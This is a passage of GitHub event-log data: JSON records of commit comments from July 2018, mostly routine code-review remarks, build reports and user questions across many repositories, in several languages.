{"id":"8027021073","type":"CommitCommentEvent","actor":{"login":"eveperalta"},"repo":{"name":"eveperalta/portia"},"payload":{"comment":{"id":29854885,"position":null,"line":null,"path":null,"commit_id":"f34ebf578f4dd89121ecdc02b5ce4b5cc95029cd","created_at":"2018-07-27T07:31:00Z","updated_at":"2018-07-27T07:31:00Z","author_association":"OWNER","body":"veo aqui tus cambios pero en mi archivo local no estan"}},"created_at":"2018-07-27T07:31:00Z"}
{"id":"8027021901","type":"CommitCommentEvent","actor":{"login":"PareshChaudhary"},"repo":{"name":"geekychaser/krishiplusplus"},"payload":{"comment":{"id":29854888,"position":null,"line":null,"path":null,"commit_id":"57eee3124681222e7f36a16c5502201ccc7e05ba","created_at":"2018-07-27T07:31:13Z","updated_at":"2018-07-27T07:31:13Z","author_association":"NONE","body":"link is not working!!! is there any other source?\r\n\r\n https://api.combatant32.hasura-app.io/       \r\n\r\nor\r\n\r\nhttps://data.combatant32.hasura-app.io/v1/query"}},"created_at":"2018-07-27T07:31:13Z"}
{"id":"8027022828","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"DLTcollab/dcurl"},"payload":{"comment":{"id":29854893,"position":null,"line":null,"path":null,"commit_id":"884300820147c3b4a747fb90c552ca1d3c61ca5b","created_at":"2018-07-27T07:31:27Z","updated_at":"2018-07-27T07:31:27Z","author_association":"CONTRIBUTOR","body":"Before introducing SSE intrinsics is introduced, we should ensure the efficiency of loop unrolling otherwise frequent SSE load/store might slow down performance."}},"created_at":"2018-07-27T07:31:27Z"}
{"id":"8027023193","type":"CommitCommentEvent","actor":{"login":"ruotianluo"},"repo":{"name":"ruotianluo/self-critical.pytorch"},"payload":{"comment":{"id":29854894,"position":null,"line":null,"path":null,"commit_id":"3a27679b845057c3b6f9d7114ce7cce60c959a02","created_at":"2018-07-27T07:31:33Z","updated_at":"2018-07-27T07:31:33Z","author_association":"OWNER","body":"Related to pytorch 0.4"}},"created_at":"2018-07-27T07:31:33Z"}
{"id":"8027024538","type":"CommitCommentEvent","actor":{"login":"skerbis"},"repo":{"name":"aeberhard/redaxo"},"payload":{"comment":{"id":29854897,"position":null,"line":null,"path":null,"commit_id":"fe72d2d63b55d08c793699499797f446da04b581","created_at":"2018-07-27T07:31:54Z","updated_at":"2018-07-27T07:31:54Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-27T07:31:54Z"}
{"id":"8027030153","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29854909,"position":1,"line":784,"path":"index.html","commit_id":"35f0ea151a3b434078f81b23bfbbef001a08dc3c","created_at":"2018-07-27T07:33:21Z","updated_at":"2018-07-27T07:33:21Z","author_association":"OWNER","body":"Если ты используешь jQuery, измени событие на $(document).ready();"}},"created_at":"2018-07-27T07:33:21Z"}
{"id":"8027031012","type":"CommitCommentEvent","actor":{"login":"xiaodeshao"},"repo":{"name":"titansec/OpenWAF"},"payload":{"comment":{"id":29854910,"position":null,"line":null,"path":null,"commit_id":"695582e187775d716bfa71986cbd8897233050eb","created_at":"2018-07-27T07:33:34Z","updated_at":"2018-07-27T07:33:34Z","author_association":"NONE","body":"rrrr"}},"created_at":"2018-07-27T07:33:34Z"}
{"id":"8027032337","type":"CommitCommentEvent","actor":{"login":"promoteglobal"},"repo":{"name":"promoteglobal/New-git-project-test"},"payload":{"comment":{"id":29854913,"position":null,"line":null,"path":null,"commit_id":"7123ec4b57d3baee2bc8e87f4c0e0275dfea4cce","created_at":"2018-07-27T07:33:55Z","updated_at":"2018-07-27T07:33:55Z","author_association":"OWNER","body":"I hope this works 1 (comment)"}},"created_at":"2018-07-27T07:33:55Z"}
{"id":"8027033010","type":"CommitCommentEvent","actor":{"login":"BasLeijdekkers"},"repo":{"name":"JetBrains/intellij-community"},"payload":{"comment":{"id":29854917,"position":22,"line":53,"path":"java/java-impl/src/com/intellij/codeInsight/daemon/impl/quickfix/ConvertSwitchToIfIntention.java","commit_id":"a3805fbf38b2725ef91503aa5f53ecee44d74526","created_at":"2018-07-27T07:34:05Z","updated_at":"2018-07-27T07:34:05Z","author_association":"CONTRIBUTOR","body":"Yes, it's just a small cleanup I added. This exception used to be a checked exception years ago, but is now an unchecked/runtime exception, and no longer necessary to have in the throws clause everywhere."}},"created_at":"2018-07-27T07:34:05Z"}
{"id":"8027035017","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29854925,"position":3,"line":6,"path":"js/scroll.js","commit_id":"35f0ea151a3b434078f81b23bfbbef001a08dc3c","created_at":"2018-07-27T07:34:37Z","updated_at":"2018-07-27T07:34:37Z","author_association":"OWNER","body":"Плохое добавление события. Сделай через on()"}},"created_at":"2018-07-27T07:34:37Z"}
{"id":"8027036890","type":"CommitCommentEvent","actor":{"login":"fe80"},"repo":{"name":"voxpupuli/puppet-nginx"},"payload":{"comment":{"id":29854929,"position":4,"line":124,"path":"manifests/params.pp","commit_id":"c1602e262d9b77d94cd365ee2be89b219625a72c","created_at":"2018-07-27T07:35:05Z","updated_at":"2018-07-27T07:35:05Z","author_association":"NONE","body":"This function is add in stdlib 4.19.0. Need change requirement vs use $facts ?"}},"created_at":"2018-07-27T07:35:05Z"}
{"id":"8027038228","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29854933,"position":27,"line":14,"path":"js/scroll.js","commit_id":"35f0ea151a3b434078f81b23bfbbef001a08dc3c","created_at":"2018-07-27T07:35:26Z","updated_at":"2018-07-27T07:35:26Z","author_association":"OWNER","body":"Неправильное добавление"}},"created_at":"2018-07-27T07:35:26Z"}
{"id":"8027038758","type":"CommitCommentEvent","actor":{"login":"Maren-Eckhoff"},"repo":{"name":"Maren-Eckhoff/website"},"payload":{"comment":{"id":29854934,"position":1,"line":1,"path":"lipsum.txt","commit_id":"45e4d86c69ffaf21303d32c67d4f413f6e023563","created_at":"2018-07-27T07:35:34Z","updated_at":"2018-07-27T07:35:34Z","author_association":"OWNER","body":"### Lipsum really?\r\n\r\nSo we __really__ were not able to find a better filler text?"}},"created_at":"2018-07-27T07:35:34Z"}
{"id":"8027043683","type":"CommitCommentEvent","actor":{"login":"Maren-Eckhoff"},"repo":{"name":"Maren-Eckhoff/website"},"payload":{"comment":{"id":29854946,"position":null,"line":null,"path":null,"commit_id":"45e4d86c69ffaf21303d32c67d4f413f6e023563","created_at":"2018-07-27T07:36:46Z","updated_at":"2018-07-27T07:36:46Z","author_association":"OWNER","body":"### Lipsum really?\r\n\r\nSo we __really__ were not able to find a better filler text?"}},"created_at":"2018-07-27T07:36:46Z"}
{"id":"8027043856","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29854947,"position":48,"line":131,"path":"index.html","commit_id":"913aaf68e387f6b1d84dca52e496deab886842de","created_at":"2018-07-27T07:36:48Z","updated_at":"2018-07-27T07:36:48Z","author_association":"OWNER","body":"inline-стили?!"}},"created_at":"2018-07-27T07:36:48Z"}
{"id":"8027045645","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29854951,"position":5,"line":18,"path":"index.html","commit_id":"913aaf68e387f6b1d84dca52e496deab886842de","created_at":"2018-07-27T07:37:16Z","updated_at":"2018-07-27T07:37:16Z","author_association":"OWNER","body":"Зечем класс для body?!"}},"created_at":"2018-07-27T07:37:16Z"}
{"id":"8027046235","type":"CommitCommentEvent","actor":{"login":"StoniVR"},"repo":{"name":"Fishbiter/gz3doom"},"payload":{"comment":{"id":29854952,"position":null,"line":null,"path":null,"commit_id":"6fe9850d9a0e0674ac0f5c632dc5eabff308f8e2","created_at":"2018-07-27T07:37:25Z","updated_at":"2018-07-27T07:37:25Z","author_association":"NONE","body":"Finally i understand where i have to put a commend. Nice to read this and even castlevainia starts. But i can´t use my touchs with new version. The Gun is tracked but no buttons work. i cant navigate in the menu. Maybe its only me, we get so many update last days. Oculus , steam, steam VR. Any nice work Gz doomVR is a blessing for Virtual Reality. \r\n"}},"created_at":"2018-07-27T07:37:25Z"}
{"id":"8027048768","type":"CommitCommentEvent","actor":{"login":"kuominglu"},"repo":{"name":"kuominglu/pi"},"payload":{"comment":{"id":29854956,"position":null,"line":null,"path":null,"commit_id":"2c9d923e63c5d89003bb32dbdbee7fcb23ac070f","created_at":"2018-07-27T07:38:05Z","updated_at":"2018-07-27T07:38:05Z","author_association":"OWNER","body":"\r\nsize(300, 300);background(255);stroke(255);for (int i = 1; i<=5; i++) {  for (int j=1; j<=5; j++) {    int r, g, b;    r = int(random(255));    g = int(random(255));    b = int(random(255));    fill(r, g, b);    print(r);    print(\", \");    print(g);    print(\", \");    println(b);    ellipse(20+i*40, 50+ j*40, 25, 25);  }}\r\n--\r\n\r\n\r\n"}},"created_at":"2018-07-27T07:38:05Z"}
{"id":"8027049234","type":"CommitCommentEvent","actor":{"login":"pentantan"},"repo":{"name":"pentantan/JapariCraftMod"},"payload":{"comment":{"id":29854959,"position":null,"line":null,"path":null,"commit_id":"266e4811fd76478691f582021231d57d7e302a1b","created_at":"2018-07-27T07:38:12Z","updated_at":"2018-07-27T07:38:12Z","author_association":"OWNER","body":"x→when two hands have item,can't open gui\r\no→fixed when two hands have item,can't open gui "}},"created_at":"2018-07-27T07:38:12Z"}
{"id":"8027049827","type":"CommitCommentEvent","actor":{"login":"pradel"},"repo":{"name":"pradel/react-responsive-modal"},"payload":{"comment":{"id":29854962,"position":null,"line":null,"path":null,"commit_id":"2ed570c33534a145b38f625788656856d6495ce7","created_at":"2018-07-27T07:38:21Z","updated_at":"2018-07-27T07:38:21Z","author_association":"OWNER","body":"You can use the `closeIconSvgPath` prop and pass the svg of your icon to it"}},"created_at":"2018-07-27T07:38:21Z"}
{"id":"8027049984","type":"CommitCommentEvent","actor":{"login":"bastelfreak"},"repo":{"name":"voxpupuli/puppet-nginx"},"payload":{"comment":{"id":29854963,"position":4,"line":124,"path":"manifests/params.pp","commit_id":"c1602e262d9b77d94cd365ee2be89b219625a72c","created_at":"2018-07-27T07:38:24Z","updated_at":"2018-07-27T07:38:24Z","author_association":"MEMBER","body":"Hi @fe80, I'm not sure if I understand your question correctly, can you rephrase that? We currently require stdlib 4.22 or newer: https://github.com/voxpupuli/puppet-nginx/blob/master/metadata.json#L13."}},"created_at":"2018-07-27T07:38:24Z"}
{"id":"8027050750","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29854966,"position":1,"line":1,"path":"js/form.js","commit_id":"913aaf68e387f6b1d84dca52e496deab886842de","created_at":"2018-07-27T07:38:36Z","updated_at":"2018-07-27T07:38:36Z","author_association":"OWNER","body":"Ты сможешь поддерживать кучу обработчиков, не разделённые на модули?"}},"created_at":"2018-07-27T07:38:36Z"}
{"id":"8027052814","type":"CommitCommentEvent","actor":{"login":"Timbwa"},"repo":{"name":"Timbwa/Zonk-Game"},"payload":{"comment":{"id":29854979,"position":43,"line":60,"path":"main.c","commit_id":"d103ef3e10b8cbe429f69110a23f8458275bb4b5","created_at":"2018-07-27T07:39:06Z","updated_at":"2018-07-27T07:39:06Z","author_association":"OWNER","body":"Noted. Thanks for your contribution. \r\nThe code isn't complete though 😅"}},"created_at":"2018-07-27T07:39:06Z"}
{"id":"8027054206","type":"CommitCommentEvent","actor":{"login":"ssngurjar"},"repo":{"name":"ssngurjar/Passenger_Security"},"payload":{"comment":{"id":29854982,"position":null,"line":null,"path":null,"commit_id":"ada0d751c52ad57be68d332594144a4c1b78bc60","created_at":"2018-07-27T07:39:27Z","updated_at":"2018-07-27T07:39:27Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-27T07:39:27Z"}
{"id":"8027055327","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29854984,"position":58,"line":58,"path":"js/form.js","commit_id":"913aaf68e387f6b1d84dca52e496deab886842de","created_at":"2018-07-27T07:39:41Z","updated_at":"2018-07-27T07:39:41Z","author_association":"OWNER","body":"Не гони: где break? Я никогда не видел switch через return;"}},"created_at":"2018-07-27T07:39:41Z"}
{"id":"8027055918","type":"CommitCommentEvent","actor":{"login":"fe80"},"repo":{"name":"voxpupuli/puppet-nginx"},"payload":{"comment":{"id":29854986,"position":4,"line":124,"path":"manifests/params.pp","commit_id":"c1602e262d9b77d94cd365ee2be89b219625a72c","created_at":"2018-07-27T07:39:49Z","updated_at":"2018-07-27T07:39:49Z","author_association":"NONE","body":"sry I just have read requirement on readme --'"}},"created_at":"2018-07-27T07:39:49Z"}
{"id":"8027063604","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855011,"position":23,"line":74,"path":"scss/_courses-list.scss","commit_id":"913aaf68e387f6b1d84dca52e496deab886842de","created_at":"2018-07-27T07:41:39Z","updated_at":"2018-07-27T07:41:39Z","author_association":"OWNER","body":"Где mixin?"}},"created_at":"2018-07-27T07:41:39Z"}
{"id":"8027065228","type":"CommitCommentEvent","actor":{"login":"haya1300"},"repo":{"name":"coolcat-creations/plg_fields_osm"},"payload":{"comment":{"id":29855016,"position":null,"line":null,"path":null,"commit_id":"c427cb5a6583f6aeea909e1d44839e28516d3a26","created_at":"2018-07-27T07:42:03Z","updated_at":"2018-07-27T07:42:03Z","author_association":"NONE","body":"How i become  an OpenCage Api Key"}},"created_at":"2018-07-27T07:42:03Z"}
{"id":"8027067236","type":"CommitCommentEvent","actor":{"login":"kuominglu"},"repo":{"name":"kuominglu/pi"},"payload":{"comment":{"id":29855020,"position":null,"line":null,"path":null,"commit_id":"2c9d923e63c5d89003bb32dbdbee7fcb23ac070f","created_at":"2018-07-27T07:42:32Z","updated_at":"2018-07-27T07:42:32Z","author_association":"OWNER","body":"// Example 5-3: Rollovers\r\nvoid setup() {\r\n  size(200,200);\r\n}\r\n\r\nvoid draw() {\r\n  background(255);\r\n  stroke(0);\r\n  line(100,0,100,200);\r\n  line(0,100,200,100);\r\n  \r\n  // Fill a black color\r\n  noStroke();\r\n  fill(0);\r\n\r\n  // Depending on the mouse location, a different rectangle is displayed.    \r\n  if (mouseX < 100 && mouseY < 100) {\r\n    rect(0,0,100,100);\r\n  } else if (mouseX > 100 && mouseY < 100) {\r\n    rect(100,0,100,100);\r\n  } else if (mouseX < 100 && mouseY > 100) {\r\n    rect(0,100,100,100);\r\n  } else if (mouseX > 100 && mouseY > 100) {\r\n    rect(100,100,100,100);\r\n  }\r\n}"}},"created_at":"2018-07-27T07:42:32Z"}
{"id":"8027068135","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29855022,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-27T07:42:46Z","updated_at":"2018-07-27T07:42:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T07:42:46Z"}
{"id":"8027069402","type":"CommitCommentEvent","actor":{"login":"thisismike97"},"repo":{"name":"jgarff/rpi_ws281x"},"payload":{"comment":{"id":29855028,"position":null,"line":null,"path":null,"commit_id":"caa135d2216400c8f7d4aaff956ba5347a4463ef","created_at":"2018-07-27T07:43:07Z","updated_at":"2018-07-27T07:43:07Z","author_association":"NONE","body":"Here is the FULL output of the command:\r\n\r\n<details>\r\n  <summary>Click to expand</summary>\r\nprocessor\t: 0\r\nmodel name\t: ARMv7 Processor rev 4 (v7l)\r\nBogoMIPS\t: 38.40\r\nFeatures\t: half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt vfpd32 lpae evtstrm crc32 \r\nCPU implementer\t: 0x41\r\nCPU architecture: 7\r\nCPU variant\t: 0x0\r\nCPU part\t: 0xd03\r\nCPU revision\t: 4\r\n\r\nprocessor\t: 1\r\nmodel name\t: ARMv7 Processor rev 4 (v7l)\r\nBogoMIPS\t: 38.40\r\nFeatures\t: half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt vfpd32 lpae evtstrm crc32 \r\nCPU implementer\t: 0x41\r\nCPU architecture: 7\r\nCPU variant\t: 0x0\r\nCPU part\t: 0xd03\r\nCPU revision\t: 4\r\n\r\nprocessor\t: 2\r\nmodel name\t: ARMv7 Processor rev 4 (v7l)\r\nBogoMIPS\t: 38.40\r\nFeatures\t: half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt vfpd32 lpae evtstrm crc32 \r\nCPU implementer\t: 0x41\r\nCPU architecture: 7\r\nCPU variant\t: 0x0\r\nCPU part\t: 0xd03\r\nCPU revision\t: 4\r\n\r\nprocessor\t: 3\r\nmodel name\t: ARMv7 Processor rev 4 (v7l)\r\nBogoMIPS\t: 38.40\r\nFeatures\t: half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt vfpd32 lpae evtstrm crc32 \r\nCPU implementer\t: 0x41\r\nCPU architecture: 7\r\nCPU variant\t: 0x0\r\nCPU part\t: 0xd03\r\nCPU revision\t: 4\r\n\r\nHardware\t: BCM2835\r\nRevision\t: a020d3\r\nSerial\t\t: 00000000d2411e2b\r\n\r\n</details>\r\n\r\nIt's the same revision as specified in this commit, so i'm sincerely confused about why it's not working?\r\nMaybe I did something wrong somewhere, but where...? Any ideas?"}},"created_at":"2018-07-27T07:43:07Z"}
{"id":"8027069462","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855029,"position":9,"line":100,"path":"index.html","commit_id":"6f9f235a17428f33a521375f3358f7a749089cd0","created_at":"2018-07-27T07:43:08Z","updated_at":"2018-07-27T07:43:08Z","author_association":"OWNER","body":"Ты уверен с точки зрения семантики?"}},"created_at":"2018-07-27T07:43:08Z"}
{"id":"8027071802","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855039,"position":121,"line":450,"path":"index.html","commit_id":"6f9f235a17428f33a521375f3358f7a749089cd0","created_at":"2018-07-27T07:43:42Z","updated_at":"2018-07-27T07:43:42Z","author_association":"OWNER","body":"Какие inline-стили?"}},"created_at":"2018-07-27T07:43:42Z"}
{"id":"8027075566","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855052,"position":5,"line":78,"path":"scss/_courses-list.scss","commit_id":"6f9f235a17428f33a521375f3358f7a749089cd0","created_at":"2018-07-27T07:44:38Z","updated_at":"2018-07-27T07:44:38Z","author_association":"OWNER","body":"Это нужно задавать через переменную;"}},"created_at":"2018-07-27T07:44:38Z"}
{"id":"8027081404","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29855061,"position":null,"line":null,"path":null,"commit_id":"92fd61bbae08501ad37a19fae6fd4041d6d7f092","created_at":"2018-07-27T07:46:05Z","updated_at":"2018-07-27T07:46:05Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-27T07:46:05Z"}
{"id":"8027082579","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855063,"position":48,"line":33,"path":"scss/_header.scss","commit_id":"ae064e82872f5e70927941875a9916f23cb8ca0b","created_at":"2018-07-27T07:46:22Z","updated_at":"2018-07-27T07:46:22Z","author_association":"OWNER","body":"Не гони. z-index:9999;"}},"created_at":"2018-07-27T07:46:22Z"}
{"id":"8027083554","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855064,"position":53,"line":38,"path":"scss/_header.scss","commit_id":"ae064e82872f5e70927941875a9916f23cb8ca0b","created_at":"2018-07-27T07:46:38Z","updated_at":"2018-07-27T07:46:38Z","author_association":"OWNER","body":"Зачем?"}},"created_at":"2018-07-27T07:46:38Z"}
{"id":"8027085434","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855068,"position":109,"line":77,"path":"scss/_header.scss","commit_id":"ae064e82872f5e70927941875a9916f23cb8ca0b","created_at":"2018-07-27T07:47:07Z","updated_at":"2018-07-27T07:47:07Z","author_association":"OWNER","body":"Что это такое? -webkit-center"}},"created_at":"2018-07-27T07:47:07Z"}
{"id":"8027087474","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855072,"position":13,"line":74,"path":"scss/_news.scss","commit_id":"ae064e82872f5e70927941875a9916f23cb8ca0b","created_at":"2018-07-27T07:47:37Z","updated_at":"2018-07-27T07:47:37Z","author_association":"OWNER","body":"mixin"}},"created_at":"2018-07-27T07:47:37Z"}
{"id":"8027087805","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29855073,"position":6,"line":16,"path":"src/app/login-form/login-form.component.ts","commit_id":"37c272c7970c2c5c07a2fce5cb31206095a17db5","created_at":"2018-07-27T07:47:43Z","updated_at":"2018-07-27T07:47:43Z","author_association":"NONE","body":"You have to implement your own service to work with indexedDB, so this code should be simplified"}},"created_at":"2018-07-27T07:47:43Z"}
{"id":"8027088170","type":"CommitCommentEvent","actor":{"login":"alphapapa"},"repo":{"name":"skeeto/at-el"},"payload":{"comment":{"id":29855074,"position":null,"line":null,"path":null,"commit_id":"3671318a811fb51c03a792342af7b42004922809","created_at":"2018-07-27T07:47:48Z","updated_at":"2018-07-27T07:47:48Z","author_association":"NONE","body":"Thanks for updating this, Chris.  Do you think this is suitable for building projects on yet?  Are you using it for anything \"serious\" yet?  :)"}},"created_at":"2018-07-27T07:47:48Z"}
{"id":"8027090748","type":"CommitCommentEvent","actor":{"login":"fabioporta"},"repo":{"name":"pgbouncer/pgbouncer"},"payload":{"comment":{"id":29855106,"position":null,"line":null,"path":null,"commit_id":"98a19ab333aebb7402ef9f2bd4adddcb7ec1fc25","created_at":"2018-07-27T07:48:26Z","updated_at":"2018-07-27T07:48:26Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-27T07:48:26Z"}
{"id":"8027091073","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855107,"position":29,"line":98,"path":"index.html","commit_id":"ae064e82872f5e70927941875a9916f23cb8ca0b","created_at":"2018-07-27T07:48:31Z","updated_at":"2018-07-27T07:48:31Z","author_association":"OWNER","body":"inline?"}},"created_at":"2018-07-27T07:48:31Z"}
{"id":"8027094775","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29855118,"position":9,"line":6,"path":"src/app/login-form/login-form.component.html","commit_id":"37c272c7970c2c5c07a2fce5cb31206095a17db5","created_at":"2018-07-27T07:49:26Z","updated_at":"2018-07-27T07:49:26Z","author_association":"NONE","body":"you can use two way bindings and remove (submit)=\"logInUser($event)\" for current form"}},"created_at":"2018-07-27T07:49:26Z"}
{"id":"8027095866","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855123,"position":14,"line":490,"path":"index.html","commit_id":"693f04e23b8c360cdc66b035adba72c2f7b4c8ad","created_at":"2018-07-27T07:49:43Z","updated_at":"2018-07-27T07:49:43Z","author_association":"OWNER","body":"Зачем нужны классы для элементов Bootstrap?"}},"created_at":"2018-07-27T07:49:43Z"}
{"id":"8027097392","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855126,"position":126,"line":771,"path":"index.html","commit_id":"693f04e23b8c360cdc66b035adba72c2f7b4c8ad","created_at":"2018-07-27T07:50:05Z","updated_at":"2018-07-27T07:50:05Z","author_association":"OWNER","body":"Что это?"}},"created_at":"2018-07-27T07:50:05Z"}
{"id":"8027097782","type":"CommitCommentEvent","actor":{"login":"koumingming"},"repo":{"name":"backkoms/simplemall"},"payload":{"comment":{"id":29855129,"position":null,"line":null,"path":null,"commit_id":"22b088d79362faf43b7b697a79710d5c1a07f767","created_at":"2018-07-27T07:50:11Z","updated_at":"2018-07-27T07:50:11Z","author_association":"CONTRIBUTOR","body":"修改base-service的artifactId"}},"created_at":"2018-07-27T07:50:11Z"}
{"id":"8027098905","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855133,"position":5,"line":5,"path":"scss/_footer.scss","commit_id":"693f04e23b8c360cdc66b035adba72c2f7b4c8ad","created_at":"2018-07-27T07:50:28Z","updated_at":"2018-07-27T07:50:28Z","author_association":"OWNER","body":"Что это?"}},"created_at":"2018-07-27T07:50:28Z"}
{"id":"8027099870","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29855137,"position":null,"line":null,"path":null,"commit_id":"5e2881d79eb2d44401a0467fccf33c7d8bf45982","created_at":"2018-07-27T07:50:43Z","updated_at":"2018-07-27T07:50:43Z","author_association":"NONE","body":"ok I'll close it"}},"created_at":"2018-07-27T07:50:43Z"}
{"id":"8027100224","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855139,"position":68,"line":65,"path":"scss/_news.scss","commit_id":"693f04e23b8c360cdc66b035adba72c2f7b4c8ad","created_at":"2018-07-27T07:50:48Z","updated_at":"2018-07-27T07:50:48Z","author_association":"OWNER","body":"Где переменная?"}},"created_at":"2018-07-27T07:50:48Z"}
{"id":"8027100583","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29855142,"position":8,"line":18,"path":"src/app/login-form/login-form.component.ts","commit_id":"37c272c7970c2c5c07a2fce5cb31206095a17db5","created_at":"2018-07-27T07:50:53Z","updated_at":"2018-07-27T07:50:53Z","author_association":"NONE","body":"Please create something like CredentialsModel and use two way binding instead of this"}},"created_at":"2018-07-27T07:50:53Z"}
{"id":"8027101219","type":"CommitCommentEvent","actor":{"login":"MikhailDumchev"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29855144,"position":72,"line":69,"path":"scss/_news.scss","commit_id":"693f04e23b8c360cdc66b035adba72c2f7b4c8ad","created_at":"2018-07-27T07:51:02Z","updated_at":"2018-07-27T07:51:02Z","author_association":"OWNER","body":"Фиксированная высота?"}},"created_at":"2018-07-27T07:51:02Z"}
{"id":"8027107408","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29855154,"position":16,"line":26,"path":"src/app/login-form/login-form.component.ts","commit_id":"37c272c7970c2c5c07a2fce5cb31206095a17db5","created_at":"2018-07-27T07:52:29Z","updated_at":"2018-07-27T07:52:29Z","author_association":"NONE","body":"alert is not very good way to be used here. You have to create notification service or something like this. Otherwise this component will be not testable"}},"created_at":"2018-07-27T07:52:29Z"}
{"id":"8027114072","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29855168,"position":null,"line":null,"path":null,"commit_id":"cd8f41aeab471832824c9c7ac9f1d4acabebd8ae","created_at":"2018-07-27T07:54:06Z","updated_at":"2018-07-27T07:54:06Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1697 of 1698 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 652\n * OTHER_FAULT: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a 